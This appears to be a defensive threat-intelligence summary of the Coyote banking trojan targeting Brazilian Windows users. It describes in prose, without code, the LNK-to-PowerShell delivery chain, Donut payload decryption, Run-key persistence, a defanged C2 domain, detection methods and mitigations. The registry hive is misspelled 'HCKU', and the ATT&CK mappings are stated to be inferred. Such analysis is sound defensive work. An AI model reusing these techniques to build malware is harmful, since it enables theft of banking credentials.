Full Report
Brazilian Windows users are the target of a campaign that delivers a banking malware known as Coyote. "Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials," Fortinet FortiGuard Labs researcher Cara Lin said in an analysis published last week. The
Analysis Summary
# Tool/Technique: Coyote Banking Trojan
## Overview
Coyote is a banking malware primarily targeting Windows users in Brazil. Its latest campaign has expanded its reach to 1,030 sites and 73 financial institutions. The malware's primary functions are geared towards credential theft and system infiltration for financial fraud.
## Technical Details
- Type: Malware family (Banking Trojan)
- Platform: Windows
- Capabilities: Keylogging, screenshot capture, displaying phishing overlays, credential harvesting from financial applications, persistence establishment, remote payload retrieval.
- First Seen: Early 2024 (documented by Kaspersky)
## MITRE ATT&CK Mapping
*Note: Specific mappings are inferred based on described capabilities, as the source text does not explicitly list ATT&CK IDs.*
- **TA0002 - Execution**
- T1059.001 - Command and Scripting Interpreter: PowerShell
- **TA0003 - Persistence**
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information (via Donut usage and PowerShell encoding)
- **TA0007 - Credential Access**
- T1056.001 - Input Capture: Keylogging
- T1555 - Credentials from Password Stores (implied by targeting financial applications)
## Functionality
### Core Capabilities
- **Credential Theft:** Captures sensitive credentials through keylogging and phishing overlays directed at users of financial applications.
- **Information Gathering:** Executes screenshot capture functionality.
- **Initial Access/Delivery (Latest Chain):** Delivered via malicious Windows Shortcut (.LNK) files that execute encoded PowerShell commands.
### Advanced Features
- **Staged Execution:** Utilizes a multi-stage infection process involving LNK files, PowerShell scripts, a remote server retrieval step, and an interim payload.
- **Loader Usage:** Employs a loader to execute an interim payload.
- **Payload Decryption:** Injects code that leverages the **Donut** tool to decrypt and execute the final MSIL (Microsoft Intermediate Language) payloads.
- **Persistence Mechanism:** Establishes persistence by modifying the Windows Registry under `HCKU\Software\Microsoft\Windows\CurrentVersion\Run`, where it creates a new, randomly named entry pointing to a custom PowerShell command that downloads and executes the main malware function (Base64-encoded URL execution).
- **Previous Chain (2024):** Previously involved Squirrel installer executables triggering a Node.js (Electron) application, which ran a Nim-based loader.
## Indicators of Compromise
- File Hashes: [Not provided in the text]
- File Names: [Not provided in the text, implied use of LNK files as initial vector]
- Registry Keys: `HCKU\Software\Microsoft\Windows\CurrentVersion\Run` (Modified for persistence)
- Network Indicators: `tbet.geontrigame[.]com` (Source for next-stage retrieval)
- Behavioral Indicators: Execution chain starting from LNK files, use of PowerShell to download remote stages, modification of Run registry key, execution of MSIL payloads after Donut decryption.
## Associated Threat Actors
- APTs or groups responsible for the Coyote campaign (specific group name not mentioned in the text, but linked to research by Fortinet FortiGuard Labs and Kaspersky).
## Detection Methods
- **Signature-based detection:** Detection for the final Coyote payload and associated file hashes (if available).
- **Behavioral detection:** Monitoring for LNK files initiating PowerShell execution, especially commands attempting to download remote content, and suspicious modifications to the 'Run' registry keys.
- **YARA rules if available:** [Not provided in the text]
## Mitigation Strategies
- **Prevention measures:** Restricting execution from LNK files or restricting PowerShell execution from non-standard locations. Disabling autorun functionality for external media or untrusted sources.
- **Hardening recommendations:** Implementing application control to prevent unauthorized execution of MSIL payloads or staged execution environments (Node.js/Nim components if those are still in use). Ensuring strong email/endpoint filtering.
## Related Tools/Techniques
- **Donut:** Used by the malware to decrypt and execute MSIL payloads.
- Previous infection chain involved Squirrel installer, Node.js (Electron), and Nim-based loader.